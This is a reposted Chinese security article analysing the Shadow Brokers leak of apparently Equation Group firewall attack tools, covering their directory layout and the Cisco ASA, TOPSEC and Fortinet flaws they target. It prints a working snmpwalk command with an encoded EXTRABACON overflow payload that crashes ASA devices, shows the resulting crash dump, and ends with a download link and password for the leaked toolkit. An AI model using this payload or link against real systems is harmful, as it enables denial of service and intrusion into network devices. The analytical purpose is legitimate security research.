【轉載】Shadow-Brokers所泄露文件的介紹、技術分析（上）

0x01 曝光的數據與方程式和NSA的關係

從泄露數據包所解壓出的內容看，是專門針對防火牆設備進行攻擊和滲透行動時所使用的工具集。據數據曝光者Shadow Brokers所描述，這個數據包是來自於著名國家級APT攻擊團隊——方程式組織(Equation Group)。該組織具信受雇於美國國家安全局(NSA),對外發動過多次著名的國家級APT攻擊，包括震網(stuxnet)、Regin、Flame等攻擊。從文件中所包含有」JETPLOW「,」BANANALEE「等文件名和文件夾關鍵字信息, 也與之前斯諾登所曝光的NSA網路攻擊內部資料的防火牆(FIREWALL)章節內容所相符:

下圖為斯諾登報出的NSA網路攻擊的一節內容:

(BANANAGLEE可以認為是一個持續控制後門(Persistent Backdoor)攻擊框架, 通過植入和篡改Cisco防火牆OS文件, 實現對Cisco防火牆入侵後的持續控制)

通過各安全研究人員對工具集當中攻擊工具的成功驗證, 基本上確定了這些數據包是從NSA有關聯的方程式組織(Equation Group)泄露的可能性;

0x02 工具包所包含內容的分析:

文件夾下的目錄信息：

padding 文件

大小19M, 使用binwalk對文件進行分析後發現有Cisco IOS特徵,推測應該是Cisco IOS平台的OS文件,可能是在攻擊行為中留下了的;

SCRIPTS/ 目錄

該應該是攻擊行動執行組(OPS)在攻擊過程中的筆記和一些攻擊工具的使用方法筆記; 文件的最後修改時間為2013年6月份;

其中:

Bookishmute.txt 文件為一次針對TOPSEC防火牆的攻擊記錄筆記。記錄中出現的IP地址159.226.209.125為中國科學網的IP，懷疑該OPS小組有對中國相關組織進行過攻擊;

TOOLS/ 目錄

主要用來存放一些進行滲透行動(OPS)時所經常用到的工具;

OPS/ 目錄

進行攻擊行動(OPS)時的自動化工具集合

BUZZDIRECTION/ 目錄

針對Fortinet的持久化植入和控制工具集合

BANANAGLEE 目錄:

是針對ASA和PIX設備的可持續控制功能, 目的是在獲取防火牆許可權後,能夠實現對設備的持久控制, 並根據不通模塊完成對應的任務; 如任意流量調度，對感興趣的流量進行監聽等。

EXPLOIT/ 目錄

利用防火牆設備的漏洞,實現對不同防火牆(ASA,PIX,NETSCREE,TOPSEC,Fortinet)的」破門」,以期望達到獲取防火牆控制許可權的目的;

從整個文件中的目錄結構和內容信息來分，可以大體上分為三類:

一類為腳本,記錄和自動化工具文件, 主要分布在OPS,SCRIPTS,TOOLS目錄下;

第二類為利用漏洞進行破門的工具, 主要是EXPLOIT目錄,針對不同的目標,攻擊程序在不同的子文件夾中;

第三類是為了能對目標防火牆設備持續控制和進行有目的的信息採集,而準備的工程化工具,主要集中在BANANAGLEE,BARGLEE,BLASTING,BUZZDIRECTION目錄下;

0x03 漏洞利用分析

從攻擊的代碼看, 針對TOPSEC所使用漏洞類型,為防火牆通過web所提供的管理界面中存在的漏洞,一個是HTTP Cookie command injection漏洞, 一個是HTTP POST 命令注入漏洞; Fortigate防火牆則是由於HTTP cookie溢出而存在漏洞。

目前完成驗證的則是EXTRA BACON工具集中, 所使用的影響ASA 8.0-8.4版本的SNMP溢出漏洞;

當一台ASA設備配置了snmp口令比較弱或被泄露, 那麼攻擊者可以從ASA允許的snmp-server上通過精心構造的snmp溢出數據包, 實現對ASA設備telnet和ssh登陸密碼驗證的繞過;

攻擊視頻為: http://v.youku.com/v_show/id_XMTY4NzgxNTM0MA==.html

通過分析攻擊工具所構造的的數據信息發現,能夠實現針對ASA設備溢出攻擊的有效SNMP串, 可以造成ASA設備的crash。

能造成ASA設備重啟的SNMP代碼如下:

snmpwalk -v 2c -t 1 -r 0 -c $community $target_ip 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.57.64.28.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.216.1.0.0.4.51.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.253.13.54.9.139.124.36.20.139.7.255.224.144n

造成Crash的ASA信息如下:

Cisco Adaptive Security Appliance Software Version 8.2(5)nCompiled on Fri 20-May-11 16:00 by buildersnHardware: ASA5505nCrashinfo collected on 02:45:02.149 UTC Tue Aug 16 2016nTraceback:n0: 0x805e2d3n1: 0x805ede7n2: 0x8a63c84n3: 0xdd6aa6d5n4: 0xdd57d1e0n5: 0xc9a647f8n6: 0xc9bbb648nStack dump: base:0x0xc9a646b4 size:351267, active:351267n entries above ==: return PC preceded by input parametersn entries below ==: local variables followed by saved regsn ==Fn: stack frame n, contains next stack framen *: stack pointer at crashn For example:n 0xeeeeef00: 0x005d0707 : arg3n 0xeeeeeefc: 0x00000159 : arg2n 0xeeeeeef8: 0x005d0722 : arg1n 0xeeeeeef4: 0x005d1754 : return PCn 0xeeeeeef0: 0xeeeeef20 ==F2: stack frame F2n 0xeeeeeeec: 0x00def9e0 : local variablen 0xeeeeeee8: 0x0187df9e : local variable or saved regn 0xeeeeeee4: 0x01191548 : local variable or saved reg ciscoasa#nThread Name: snmpnPage fault: Address not mappedn vector 0x0000000en edi 0x0f0f0f0bn esi 0x00000000n ebp 0xc9a647b4n esp 0xc9a64738n ebx 0x00000010n edx 0xc9a6472cn ecx 0xc911d4e8n eax 0x023d0d4cnerror code 0x00000004n eip 0xc9bbae4an cs 0x00000073n eflags 0x00013203n CR2 0x023d0d68n

總結

通過對目前所掌握的Shadow-brokers所泄露出文件的分析,可以得到如下結論:

1.是專門執行對防火牆(Firewall)設備進行滲透攻擊,並高度集成的攻擊工具集;

2.該工具集覆蓋了國內外使用比較廣泛的防火牆產品;

3.破門攻擊(利用漏洞獲取防火牆許可權)時所使用的設備軟體漏洞,需要對設備漏洞進行主動的挖掘才能獲取;

4.準確可靠的漏洞利用程序(EXPLOIT)說明安全技術達到了極高的水平,有專門人員從事對網路設備安全的研究;

5.獲取目前許可權後的持續控制和隱秘, 攻擊方基本上已經形成了框架和比較統一的思路;

本文由 安全客 原創發布，如需轉載請註明來源及本文地址。

本文地址：http://bobao.360.cn/learning/detail/2970.html

——————————————————————————————————————

安全大事件註：文件下載地址為

https://mega.nz/#!zEAU1AQL!oWJ63n-D6lCuCQ4AY0Cv_405hX8kn7MEsa1iLH5UjKU

解壓密碼： theequationgroup